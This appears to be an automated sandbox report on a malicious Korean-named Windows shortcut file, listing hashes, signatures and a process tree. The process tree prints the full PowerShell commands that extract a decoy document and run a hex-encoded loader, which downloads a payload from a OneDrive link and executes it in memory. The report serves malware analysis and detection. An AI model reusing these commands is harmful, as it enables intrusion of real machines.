6234ef67435dfcb65bd661b5f3bb0b77b82fe6cdd2109b6dfb9dea1b65a17d5d

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
04-04-2023 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

북한외교정책결정과정.lnk
Size

29.7MB
MD5

be32725e676d49eaa11ff51c61f18907
SHA1

37ee57a1097bbacbece974653c0ec435ee19b4f3
SHA256

479894be4c5dec0992ad3c5b21fb1423643996d80d59dcca76386bb325dc811e
SHA512

f65a64a2934659cf7c5b58b37708011f8cfed60c5fdcb226159d3b9bcba8d551149a1769ae10486c4f33452e87261e884830be22474d10ffe8da1362b9ffeddf
SSDEEP

1536:fAJ+YScrgY3VAmoxV9RUDCcilpZLm+YScbgY3VAmoxV9RUDCcilpZL9yJ9P:fAPFVCDRgziNmFVCDRgziN9k9P

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
29	3592	powershell.exe
32	3592	powershell.exe
38	3592	powershell.exe
58	3592	powershell.exe
59	3592	powershell.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\5298.dat	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
208	powershell.exe
208	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	3592	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2212	OpenWith.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 4424 wrote to memory of 180	4424	cmd.exe	84
PID 4424 wrote to memory of 180	4424	cmd.exe	84
PID 4424 wrote to memory of 180	4424	cmd.exe	84
PID 180 wrote to memory of 208	180	cmd.exe	85
PID 180 wrote to memory of 208	180	cmd.exe	85
PID 180 wrote to memory of 208	180	cmd.exe	85
PID 208 wrote to memory of 1916	208	powershell.exe	90
PID 208 wrote to memory of 1916	208	powershell.exe	90
PID 208 wrote to memory of 1916	208	powershell.exe	90
PID 1916 wrote to memory of 4444	1916	cmd.exe	91
PID 1916 wrote to memory of 4444	1916	cmd.exe	91
PID 1916 wrote to memory of 4444	1916	cmd.exe	91
PID 4444 wrote to memory of 3592	4444	cmd.exe	93
PID 4444 wrote to memory of 3592	4444	cmd.exe	93
PID 4444 wrote to memory of 3592	4444	cmd.exe	93
PID 3592 wrote to memory of 4388	3592	powershell.exe	95
PID 3592 wrote to memory of 4388	3592	powershell.exe	95
PID 3592 wrote to memory of 4388	3592	powershell.exe	95
PID 4388 wrote to memory of 4772	4388	csc.exe	96
PID 4388 wrote to memory of 4772	4388	csc.exe	96
PID 4388 wrote to memory of 4772	4388	csc.exe	96
PID 3592 wrote to memory of 4520	3592	powershell.exe	97
PID 3592 wrote to memory of 4520	3592	powershell.exe	97
PID 3592 wrote to memory of 4520	3592	powershell.exe	97
PID 4520 wrote to memory of 4880	4520	csc.exe	98
PID 4520 wrote to memory of 4880	4520	csc.exe	98
PID 4520 wrote to memory of 4880	4520	csc.exe	98
PID 3592 wrote to memory of 4912	3592	powershell.exe	99
PID 3592 wrote to memory of 4912	3592	powershell.exe	99
PID 3592 wrote to memory of 4912	3592	powershell.exe	99
PID 4912 wrote to memory of 1692	4912	csc.exe	100
PID 4912 wrote to memory of 1692	4912	csc.exe	100
PID 4912 wrote to memory of 1692	4912	csc.exe	100
PID 3592 wrote to memory of 2288	3592	powershell.exe	101
PID 3592 wrote to memory of 2288	3592	powershell.exe	101
PID 3592 wrote to memory of 2288	3592	powershell.exe	101
PID 2288 wrote to memory of 4412	2288	csc.exe	103
PID 2288 wrote to memory of 4412	2288	csc.exe	103
PID 2288 wrote to memory of 4412	2288	csc.exe	103

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\북한외교정책결정과정.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0001DB1D86} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00091558 -ReadCount 00091558; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\230402.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002470)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00094808 -ReadCount 00094808; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230402.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00091558)) -Encoding Byte; ^& $exePath;
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0001DB1D86} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00091558 -ReadCount 00091558; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\230402.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 002470)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00094808 -ReadCount 00094808; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230402.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00091558)) -Encoding Byte; & $exePath;
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\230402.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1916
    - - \??\c:\Windows\SysWOW64\cmd.exe
        
        c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$ppams ="$eric5="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C3355766379464264544A746554463461445A304F46686E556A4A4E656D317A4F47356F556E64764C545A4350325539616B6849517A5A352F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4444
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "$ppams ="$eric5="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C3355766379464264544A746554463461445A304F46686E556A4A4E656D317A4F47356F556E64764C545A4350325539616B6849517A5A352F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
        6⤵
        Blocklisted process makes network request
        Checks BIOS information in registry
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3592
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ozy3yow5\ozy3yow5.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4388
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESADE8.tmp" "c:\Users\Admin\AppData\Local\Temp\ozy3yow5\CSC7734D6345F43EC955E3D76D0E4DDDA.TMP"
        8⤵
        
        PID:4772
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ho2rdex\3ho2rdex.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4520
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF21.tmp" "c:\Users\Admin\AppData\Local\Temp\3ho2rdex\CSCBBA85221CFE4515ABE6A8CC31F54421.TMP"
        8⤵
        
        PID:4880
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mbqi14lh\mbqi14lh.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4912
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB134.tmp" "c:\Users\Admin\AppData\Local\Temp\mbqi14lh\CSC3326E2B63F094A2F8C2894D786B89212.TMP"
        8⤵
        
        PID:1692
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mzkhrmkx\mzkhrmkx.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2288
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2BB.tmp" "c:\Users\Admin\AppData\Local\Temp\mzkhrmkx\CSCD54CE3BDE59C4283AB556E85465D1DF0.TMP"
        8⤵
        
        PID:4412

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2212

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
0774a05ce5ee4c1af7097353c9296c62

SHA1
658ff96b111c21c39d7ad5f510fb72f9762114bb

SHA256
d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

SHA512
104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
9c96b26d9a8f7f8537a4d01a35645895

SHA1
3fcc27e1d2563e63b2a3831d12adc3207aae4a97

SHA256
16f6dc7b975d43ab175390fdba8ebca6143db29976bd0d91981bb63ec99370d7

SHA512
263451de0c836ff2ada456ae48fa325b97328bc7a5d5aa6490ed36d65f30b54eeff6c916dcb4bb520f1a0c22a6a953bb4ec409da47dcd2ed1bb4d89abcb09328

Download Submit
C:\Users\Admin\AppData\Local\Temp\230402.bat

Filesize
3KB

MD5
461ce7d6c6062d1ae33895d1f44d98fb

SHA1
76e9c63f48121faf26bc1046eac27ec6967e64d4

SHA256
70f9216f0c5badb24120f74270dbbc5100b07c4fc6eb45f6652b00882290a73c

SHA512
680e1503a4ce7fe49ebe559531102710a2b50e59ee65d6aa20a0af1d8a58a4986f198c8f03a58bdb13fcc76cedc9724812e8948a42b45c8a6066bb250554f03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ho2rdex\3ho2rdex.dll

Filesize
3KB

MD5
d9d96a00d567394db97c3eba3ce43770

SHA1
e21e9e5d009823db1421ff290ec7e20385f543de

SHA256
680720596f3799db2c141c15982dde80e6b9623c34036e9ab311d7322e4657b0

SHA512
91f8b69a3dbed6c0e95113d1de5075284b3a9c88d219b6b59dba8254abb05eeadafee209d384860c52d6ed1d893dd596345db3fcbace82fc362206b58e04ab29

Download Submit
C:\Users\Admin\AppData\Local\Temp\71BD66B1.tmp

Filesize
58KB

MD5
0a62b3d88e2a59cc6a53aa0ce4fde572

SHA1
0c677c997cf86f597393e11e44b277234c124a8e

SHA256
0f614884def5ad6cd7fb7c653b551f9534a6cc278a6fc11624e15444e40a2606

SHA512
2cd04ffcc824de9eba0558d96d330ef6f2f5e9576415266b4d5ac0aeaed55b0e8aa8976dcbe95b7ea83d94eeffb6ff7481399c9386d097b9f1e0ea402094e873

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESADE8.tmp

Filesize
1KB

MD5
9c44e70a65884877628559a9e764ff0f

SHA1
8eb5bd254bd8e12160ced108af6e448ba3303b80

SHA256
1c8eeed2c4740bac6b2d6e5ab7cb51100cf865a88c09083409726d217b754e7a

SHA512
4945d4a44f5ec3038f1006fbb618c0eaa3f10c729e69a5a6ed22906e3f61883ff7ac9dd6847e2992f865f326df9645f5f9cd1757cd35aaef0d983eef67136337

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAF21.tmp

Filesize
1KB

MD5
b8717c711b1954f649f3295b5c39191e

SHA1
36c85546a03c6f8a51be1dd9c00b5530b6e23662

SHA256
8c29c84de6a864b122fb8d700220bb436f7501a3ab56c80999eb9d3fd40f7528

SHA512
8bb7ed4179bd94f4e1afe349c5c31223a81f01491d6045f5331153958a539c65df5fa5eafd36eebcc24619ffd2726ed9bdb9ac31ba6945c898dc8a763b95c277

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB134.tmp

Filesize
1KB

MD5
87983e9a9c457496eb0d58c302af7c3d

SHA1
e074bf14a112e0656e5de435e5ffe12fafb3d678

SHA256
e893eb6f6ca50a36f40f34ff351e8e8909bebb55fa7182c3d207bdc950b369f2

SHA512
265fcdec34c19b0790968be3111b04e55f886a86b9210eda430303e0ad00ef285798306c07a19b3d8ea8b3867db3bad7ad266f66fe4dd0bebcfb16909c52764e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB2BB.tmp

Filesize
1KB

MD5
3fcd69c0b0a43139ea059c21b07bc174

SHA1
d9f895afefbe58ad3987e25eede846813cb6ea28

SHA256
cd081e932cd9777958e41bc22cc74007145f3e2efc509aca92caca5a0b5f389f

SHA512
2ab4fcc8215614b2e7f8637f3d1adcdf75cce93746505ac71f68f8a68b67db8ab3c55d63da2e16229a96e8d5729189fe0d36edd74597ae24aad7538de6f40a21

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_flnb0jf1.q2i.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mbqi14lh\mbqi14lh.dll

Filesize
3KB

MD5
1610653a5996f7640380eb9468bb13ed

SHA1
34f13ddf49ec12d81eba5dbe34eab58321113261

SHA256
4b764fafc343ad66a1f929082bb7115ab8ca580b45a72f261c3fb2c42c7837e0

SHA512
d79876a309f614458c04399878a5a24958f549e8ea8412bf15bcb1712e44713b3728e1fbbfe582969f8f1caa2290285d3feac58cff0147c1a5b444b4671a884d

Download Submit
C:\Users\Admin\AppData\Local\Temp\mzkhrmkx\mzkhrmkx.dll

Filesize
3KB

MD5
71904886514ebe7db06966ce711b177b

SHA1
966b261c1eaeda2df4316e356bf67a81e0f0d6ff

SHA256
c07bc6037549ff7b277018a54675be8bd53bec2e987c9bfb6325659855ab2999

SHA512
ba22ce09a44812961c1faeca01b801d7ded639aee518858e5ad7617c4d642ce84825c289bfc4a247cc439a973a06679a314fd79722d5bb2c07a5850f0a37312b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozy3yow5\ozy3yow5.dll

Filesize
3KB

MD5
b3bcc3c21a93a4510c14d8375b1a8f31

SHA1
f13e245193aef8d6e236c33a15e79c24bac30442

SHA256
f5aff1fbdf7987d8dfaa8940c556cfe9a6fd90ee2b1b309445dc0fdc5536c776

SHA512
3628ec9c3ac3a9864413c5c46a28a0beb8adbdea9cfdbbbae1ccd558b60d5147d18f52e88f596d30e6284d599dbdd84ba517ea9d4c2bd8e0300863933b20e006

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3ho2rdex\3ho2rdex.0.cs

Filesize
272B

MD5
4de985ae7f625fc7a2ff3ace5a46e3c6

SHA1
935986466ba0b620860f36bf08f08721827771cb

SHA256
53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

SHA512
067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3ho2rdex\3ho2rdex.cmdline

Filesize
369B

MD5
b702976180c5f517da2f2b973cd58206

SHA1
980013252e9aa143c4b87a164f21923654c8a7ae

SHA256
ef730be819c52dad134a8c6fee1c222887ad78533257e226174b2001d889d868

SHA512
ee0cc595bea30cc0b6028b960c35f259965e7f35bdaa65c8880832fa0e7fbf1d0db36595a193632d0ede2edbd598b1d459cb3a19e2de4070d06587573a0dcd23

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3ho2rdex\CSCBBA85221CFE4515ABE6A8CC31F54421.TMP

Filesize
652B

MD5
5e4f8043201ad1c9fdf97e13da87ce68

SHA1
119e2efaa2cb2b7a9a214775bf34742ae50e1999

SHA256
321eeb2ec5f3a785e551196a25465212bed69653b90fd5198d4133ae90f1b81e

SHA512
61a4a13d3d0a51799e8a5c660f85340ed4a65f93dc9bfc1f4aabbafa1a31a76ac614c48d9156dcc9596405d6dc658e8240e79aba0eea71cb2ae2cdca06fe9bb3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mbqi14lh\CSC3326E2B63F094A2F8C2894D786B89212.TMP

Filesize
652B

MD5
e2ad201e9bdb23f82304675ea07635a0

SHA1
b0931c4286d04441d7af074d7d0852e20f6b1d81

SHA256
6d4f9e9b451b036020933fe7fef60e75c0dc02325ac8aa24469690b136497024

SHA512
348e97715232a0442aea34f33180a401371f4689dff26aba7e1354b1221f9c7c363f05bdf67d21acc07f5d379336d108a5dbde44a6bb394f0016428bd3deae74

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mbqi14lh\mbqi14lh.0.cs

Filesize
286B

MD5
b23df8158ffd79f95b9bddd18738270b

SHA1
79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

SHA256
856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

SHA512
e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mbqi14lh\mbqi14lh.cmdline

Filesize
369B

MD5
434e59eba0895cae5d0ca542406a3e5f

SHA1
87094ac68a43acf511c606275817f2e987fde3cc

SHA256
2e24cbd49d158978ab91a308f7b878e0af864b1119ed816e7069286e380d2080

SHA512
a3356b28e34c730d2201be8fe3a7491406557c7f0378ca17c0677d6bfca5299da9a9062c542d4e10dbc1272529c348285ca3768c885956afc6a8f49a2857a685

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mzkhrmkx\CSCD54CE3BDE59C4283AB556E85465D1DF0.TMP

Filesize
652B

MD5
b9e576e6ff21e09d53d94cd7c9a99ce6

SHA1
27767771b304a7a3a008fe4dfe4ca9f95b80ad24

SHA256
5543c50906da3314ff110c35506f5285d8247d12d969efe272f860cba540f9e2

SHA512
90df48b69c60ea3742f6d4dd3089a078d6ca080659e41a68098e57767a868aba1779f3a20ab82cb478f187b6e55b3d9a5e2ed1a94f4f97d29e9743a96970821a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mzkhrmkx\mzkhrmkx.0.cs

Filesize
259B

MD5
560e1b883a997afcfa3b73d8a5cddbc1

SHA1
2905f3f296ac3c7d6a020fb61f0819dbea2f1569

SHA256
e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

SHA512
041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mzkhrmkx\mzkhrmkx.cmdline

Filesize
369B

MD5
5d1ab8788e11e27b5a1b87f72257ae56

SHA1
14bdd8df0fd2fe60ca90c4493ad11e2c28b0a07b

SHA256
df2852c8207afea98890898cecacfe596dde67d59f859fb3e5068f0ffba9deee

SHA512
b4d33549fa608bede8c15ef930bfb4ee2f891db4da49b0a3dc839b8e7f86bbee202657d489304ae05ef856fba0a1b85ae0339a5ef66a7b485020535fb66807ce

Download Submit
